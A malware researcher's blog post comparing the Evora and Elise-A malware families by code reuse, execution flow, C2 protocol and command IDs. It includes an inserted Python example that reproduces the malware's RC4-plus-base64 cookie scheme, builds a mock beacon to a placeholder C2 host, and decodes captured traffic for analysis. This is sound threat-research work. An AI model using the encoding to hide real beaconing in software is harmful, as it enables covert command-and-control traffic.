Part 1: Evora vs Elise — The Twins

geumland
Published in insomniacs
Mar 5, 2020

If you read my last post, you will know that I have been studying samples of Evora. At the start, it was for the purpose of learning, but as I continued, I got so hooked that I could not pull myself away from it.

Today, I am excited to start sharing my findings on how Evora has evolved over the years! I will split this into a few parts for ease of digestion.

In this first part, let us start with how, or from where, Evora originated.

During this study, I first encountered the name “Elise” when I was looking for samples of Evora to compare with the Sagerunex samples I saw in a Symantec report. The CylanceV blog post by Brian Wallace (https://threatvector.cylance.com/en_us/home/hunting-for-malware-with-machine-learning.html), which is the source of my Evora samples, also publishes a list of Elise samples.

Well, since I was downloading these Evora samples anyway, there was no harm in downloading the Elise ones too, right?

Having downloaded the Elise samples, I decided to take a look. I also did some light research on Elise and found the report “Operation Lotus Blossom” by Palo Alto Networks Unit 42 (https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html), which contains a detailed analysis of 3 variants of Elise.

Having read the Palo Alto Networks report and analyzed Elise at the same time, I realized that all the Elise samples I had downloaded belong to Elise Variant A, as categorized by Palo Alto Networks.

Later on, when I started analyzing samples of Evora, I found that Evora and Elise Variant A (Elise-A) are very similar, to the point that I think Elise-A = Evora. Why do I say so? Let’s take a look at some of their similarities.

1) Similar Execution Flow & Code Reuse

One major factor that leads me to think Elise-A and Evora are the same is their execution flow. Evora may be more modularized, and certain code may be repositioned, but its main execution flow remains the same as that of Elise-A.

For example, in the entry function of both malware families, the C2 configuration data is decoded before the service control handler is registered. Even the C2 configuration decoding function is exactly the same.

Same execution flow and function used

Another example: in Elise-A, a temp file for logging purposes is created before the thread is created, whereas at first glance this activity is not observed in Evora. However, if we look at the thread Evora creates, a temp file for logging is created the moment the thread starts, before any other action. So while the creation of the temp file is positioned differently (before thread creation in Elise-A, inside the created thread in Evora), in both cases it still happens before the other activities in the thread are executed.

Code shifted but overall execution flow remains the same

The above are just a few simple examples showing that there are code similarities between the two malware families, and it does not stop there. Their resemblance in code and execution flow is extensive, and listing all of it would be never-ending.

2) Same C2 Communication Protocol

The similarities between Elise-A and Evora go beyond code and execution flow. Both use the same C2 communication protocol: they communicate with the C2 server using HTTP GET/POST requests. Data to be transmitted to the C2 is RC4-encrypted, then base64-encoded, and then passed as a cookie value in the request.

Example of an HTTP GET request sent to the C2 by Evora

Not only that, the structure/format of their C2 traffic is also the same.

C2 traffic structure of Elise and Evora (Credit: image taken from the Palo Alto Networks report “Operation Lotus Blossom”)
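The cookie encoding just described (RC4, then base64, carried as a cookie value in an HTTP request) is simple to replicate for triage. The following is an added example written for this post; it is not code from the malware or from the Palo Alto Networks or Cylance reports. The cookie name, the RC4 key and the beacon content are constructed placeholders, since the post gives none of them. It builds a request in the described shape and then shows the defender's direction: pulling the cookie out of a captured request and decoding it once the RC4 key has been recovered from a sample.

```python
import base64
import re
from typing import Dict, Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation). The keystream is
    XORed onto the data, so the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_cookie_value(key: bytes, plaintext: bytes) -> str:
    """RC4-encrypt, then base64-encode: the layering the post describes."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def decode_cookie_value(key: bytes, value: str) -> bytes:
    """Reverse the layering: base64-decode, then RC4-decrypt."""
    return rc4(key, base64.b64decode(value, validate=True))


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie header value into name -> value pairs ("a=1; b=2")."""
    cookies: Dict[str, str] = {}
    for pair in header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def is_base64_blob(value: str) -> bool:
    """Cheap triage heuristic: does a cookie value look like a base64 blob
    rather than an ordinary session token?"""
    return bool(re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value)) and len(value) % 4 == 0


# Constructed placeholders: the post names no cookie, key or beacon format.
COOKIE_NAME = "SESSIONID"
SAMPLE_KEY = b"constructed-sample-key"
SAMPLE_BEACON = b"id=1001;host=WORKSTATION-01"


def build_sample_request(key: bytes = SAMPLE_KEY, beacon: bytes = SAMPLE_BEACON) -> str:
    """Constructed HTTP GET request carrying the encoded beacon in a cookie."""
    return (
        "GET /index.php HTTP/1.1\r\n"
        "Host: c2.example.invalid\r\n"
        f"Cookie: {COOKIE_NAME}={encode_cookie_value(key, beacon)}\r\n"
        "\r\n"
    )


def recover_beacon(raw_request: str, key: bytes, cookie_name: str = COOKIE_NAME) -> Optional[bytes]:
    """Given a captured request and a key recovered from a sample, pull the
    named cookie out of the Cookie header and decode it. Returns None when
    the request carries no such cookie or the value is not valid base64."""
    match = re.search(r"^Cookie:\s*(.+?)\r?$", raw_request, re.MULTILINE | re.IGNORECASE)
    if not match:
        return None
    value = parse_cookie_header(match.group(1)).get(cookie_name)
    if value is None or not is_base64_blob(value):
        return None
    try:
        return decode_cookie_value(key, value)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


if __name__ == "__main__":
    request = build_sample_request()
    print(request)
    print("recovered:", recover_beacon(request, SAMPLE_KEY))
```

The `rc4` function is deliberately self-contained so the example runs without third-party packages; in a real workflow the key would come from the decoded C2 configuration of the sample under analysis, and `recover_beacon` would be run over requests carved from a capture.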

3) Same Command IDs and Tasks

Even the list of available C2 command IDs and their respective tasks is the same between Elise-A and Evora.

My Assessment

Those mentioned above are just some of the major similarities, the kind that I feel malware analysts look out for when correlating malware. If you ever look at Elise-A and Evora in detail, you will probably find that they look even more alike than what I have managed to describe here.

It is possible for two different malware families to resemble each other in code and execution flow, as they may have been written by the same developer. It is also possible for two different malware families to use the same C2 communication protocol, have the same C2 traffic structure, use the same command IDs and execute the same command tasks, as they could be using the same C2 infrastructure.

However, I do not think it is possible for two different malware families to have the same code and execution flow, the same C2 communication protocol, and the same command IDs and tasks all at the same time. If they were so similar, they would have been grouped as one malware family instead of two. Would they not? This is how I feel about Elise-A and Evora: they should be grouped together as the same malware family. In fact, a comparison of the two using BinDiff yields a similarity of 80% or more.

Therefore, I am puzzled as to who classified them differently in the first place, and why. My only guess is that it was due to the file or export function names and some of the strings found in the malware. Elise-A contains references to the name “Elise”, such as “EliseDLL.dll” and “EliseA320.tmp”, while Evora contains strings and references to the name “Evora”, such as “EvoraDLL.dll”. But is this a good enough basis?

The Twist

As I continued to look through samples of Evora over the years, I found that Evora took a major turn in 2014, two years after the earliest observed compilation date of Evora and Elise-A. Even though the C2 communication protocol and commands remained the same, the change makes a distinct difference between Evora and Elise-A. From there, Evora evolved further, and the Evora we have now is completely different from the Elise we know.

Perhaps, back then, even though they were almost identical, the analyst who labelled them already foresaw, based on the string references found within the malware, that these tools would be developed separately, and thus classified them as different. Whether this is true or not, it made me realize that malware analysis and attribution is not just about reporting facts and figures, but also about being able to look through those facts and foresee what may happen in the future.

Up Next …

What is the major change Evora took in 2014 that makes it distinct from Elise? How has Evora changed over the years? Stay tuned!
